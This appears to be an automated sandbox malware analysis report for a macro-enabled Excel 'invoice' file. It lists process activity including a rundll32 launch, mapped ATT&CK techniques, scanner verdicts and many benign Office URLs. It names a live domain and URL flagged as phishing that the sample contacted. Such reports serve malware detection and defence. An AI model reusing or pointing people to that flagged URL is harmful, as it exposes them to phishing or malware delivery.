Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting21	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools1	LSASS Memory	System Information Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Rundll321	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting21	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
indianoci.co.uk	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
http://indianoci.co.uk/ufriends/support.php	12%	Virustotal		Browse
http://indianoci.co.uk/ufriends/support.php	100%	Avira URL Cloud	phishing
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://ovisualuiapp.azurewebsites.net/pbiagave/	0%	Avira URL Cloud	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
indianoci.co.uk	172.67.189.4	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://indianoci.co.uk/ufriends/support.php	true	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://login.microsoftonline.com/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://shell.suite.office.com:1443	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://autodiscover-s.outlook.com/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://cdn.entity.	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://powerlift.acompli.net	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://cortana.ai	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://api.aadrm.com/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://api.microsoftstream.com/api/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://cr.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://ecs.office.com/config/v2/Office	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://graph.ppe.windows.net	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://officeci.azurewebsites.net/api/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://store.office.cn/addinstemplate	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://globaldisco.crm.dynamics.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://store.officeppe.com/addinstemplate	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://web.microsoftstream.com/video/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://graph.windows.net	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://dataservice.o365filtering.com/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://www.cloudflare.com/5xx-error-landing	support[1].htm.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://ncus.contentsync.	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
http://weather.service.msn.com/data.aspx	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://apis.live.net/v5.0/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://management.azure.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://wus2.contentsync.	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://api.office.net	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://incidents.diagnosticssdf.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://entitlement.diagnostics.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://outlook.office.com/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://templatelogging.office.com/client/log	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://outlook.office365.com/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://webshell.suite.office.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://management.azure.com/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://devnull.onenote.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://ncus.pagecontentsync.	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://messaging.office.com/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://augloop.office.com/v2	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://skyapi.live.net/Activity/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://dataservice.o365filtering.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://ovisualuiapp.azurewebsites.net/pbiagave/	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false		high
https://directory.services.	651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.189.4	indianoci.co.uk	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385000
Start date:	11.04.2021
Start time:	00:16:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 19s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	invoice_661434949_67552437.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.expl.evad.winXLSM@3/10@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
